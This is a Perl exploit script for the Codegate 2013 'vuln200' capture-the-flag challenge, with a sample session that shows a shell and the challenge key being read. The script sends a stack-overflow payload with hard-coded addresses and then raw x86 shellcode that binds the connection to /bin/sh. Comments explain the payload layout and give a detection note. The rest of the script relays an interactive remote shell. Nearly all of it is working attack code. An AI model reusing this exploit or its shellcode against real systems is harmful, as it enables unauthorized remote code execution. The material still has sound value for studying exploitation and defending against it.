
#!/usr/bin/perl
# codegate2013 vuln200 exploit
# cutz
#
# perl expl_vuln200.pl 58.229.122.19 7777
# [x] exploit successfull
# $ id
# uid=1001(codegate2013) gid=1001(codegate2013) groups=1001(codegate2013)
# $ ls
# dump.txt
# key
# logs
# pwn2
# $ cat key
# Key is "This_is_C0G6ESTYL3!_:)"

use strict;
use warnings;
use IO::Socket;

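# Unbuffer STDOUT so the prompt and the relayed output show up immediately.
$| = 1;

# Target host and port are taken from the command line, in that order.
my $ip   = shift;
my $port = shift;

# Without both arguments the connect below would fail with an unhelpful
# "Conn failed" (plus uninitialized-value warnings), so stop early instead.
die "usage: $0 <host> <port>", $/
    unless defined $ip && defined $port;

my $sock;
my $buf;

# Direct method call rather than the indirect-object form "new Class (...)",
# which Perl can mis-parse and which is disabled under newer feature bundles.
$sock = IO::Socket::INET->new(
    PeerAddr => $ip,
    PeerPort => $port,
    Proto    => 'tcp',
) or die "Conn failed", $/;

# Read up to 1024 bytes of whatever the service sends first. The content is
# never inspected; the read only consumes the initial output before the
# request is written.
sysread $sock, $buf, 1024, 0;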

# First-stage request: the literal command "write", 240 filler bytes, then six
# values packed with "I" (Perl's native unsigned int; "V" would pin the
# encoding to 32-bit little-endian regardless of the host running the script).
#
# The service binary is not shown on this page, so the role of each value is
# inferred from the layout only: one code address, the address execution would
# continue at afterwards, then four call arguments. TODO confirm against the
# binary.
#
# NOTE(review): every address is hard-coded, so this layout presumably depends
# on the target being mapped at a fixed base (a non-PIE 32-bit ELF) with
# 0x0804c000 both writable and executable. Position-independent builds with
# ASLR, a stack protector and non-executable data pages are the mitigations
# this layout would not survive — confirm against the challenge build.
my $payload =
"write" .
"A"x240 .                  # filler; presumably reaches a saved return address
pack("I", 0x08048780) .    # code address; presumably a receive-style routine in the binary
pack("I", 0x0804c000) .    # where execution continues after that routine returns
pack("I", 0x00000004) .    # 1st argument; presumably the descriptor of this connection
pack("I", 0x0804c000) .    # 2nd argument; presumably the destination buffer (same address as above)
pack("I", 0x00000100) .    # 3rd argument; presumably a length of 256 bytes
pack("I", 0x00000000);     # 4th argument; presumably flags

# The request is written without a trailing newline.
print $sock $payload;
# Four-argument select with undef handles is Perl's sub-second sleep (~0.1 s).
# Presumably this keeps the second write below from being read by the server
# together with the first — timing-dependent, confirm.
select undef, undef, undef, 0.101;

# Second-stage data: 39 bytes of raw 32-bit x86 Linux machine code, sent
# as-is. Decoded from the bytes below:
#   - a loop issuing syscall 0x3f (dup2) with descriptor 4 as the source and
#     0, 1, 2 as the targets, so stdin/stdout/stderr point at descriptor 4;
#   - syscall 0x0b (execve) on the string "/bin//sh" built on the stack.
# NOTE(review): descriptor 4 is assumed to be this connection inside the
# service process — it matches the 1st argument in the request above; confirm.
#
# Detection note: the observable result on the host is the service process
# replacing itself with /bin/sh while its standard descriptors are a network
# socket; the "/bin" and "//sh" immediates followed by int 0x80 also appear
# verbatim in the traffic.
print $sock
"\x31\xc9\x6a\x3f\x58\x6a\x04\x5b\xcd\x80" .
"\x41\x83\xf9\x03\x75\xf2\x6a\x0b\x58\x99" .
"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" .
"\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";

# Consume up to 1024 bytes of pending output; the content is not inspected.
sysread $sock, $buf, 1024, 0;
# Send a marker command. If a shell is now reading from the socket it echoes
# the marker back.
print $sock "echo EXPLOITED", $/;
# Two reads into the same buffer at offset 0: the second overwrites the first,
# so only the second chunk is tested below.
# NOTE(review): which read the marker arrives in depends on how the replies
# are split on the wire — timing-dependent, confirm.
sysread $sock, $buf, 1024, 0;
sysread $sock, $buf, 1024, 0;

# The marker must be at the very start of the last chunk read.
if ($buf =~ /^EXPLOITED/) {
print "[x] exploit successfull", $/;
} else {
print "[x] failed", $/;
close $sock;
# Bare exit returns status 0, so a failed run is not visible in the exit code.
exit;
}

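# Relay loop: one line of local input is written to the socket, then a single
# read of up to 1024 bytes is printed back. A command that produces no output
# blocks in sysread, and output longer than one read shows up on later turns.
my $cmd;
while (1) {
    print "\$ ";

    # <> returns undef at end of input. The original loop kept going on undef,
    # printing an undefined value to the socket forever and never reaching the
    # close below.
    $cmd = <>;
    last unless defined $cmd;

    print $sock $cmd;

    # sysread returns 0 once the peer has closed the connection and undef on
    # error; either way there is nothing more to relay.
    my $got = sysread $sock, $buf, 1024, 0;
    last unless $got;

    print $buf;
}

close $sock;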

Original writeup (http://pastie.org/pastes/6370793/text?key=p9d1ijitax9adfrm7ife9g).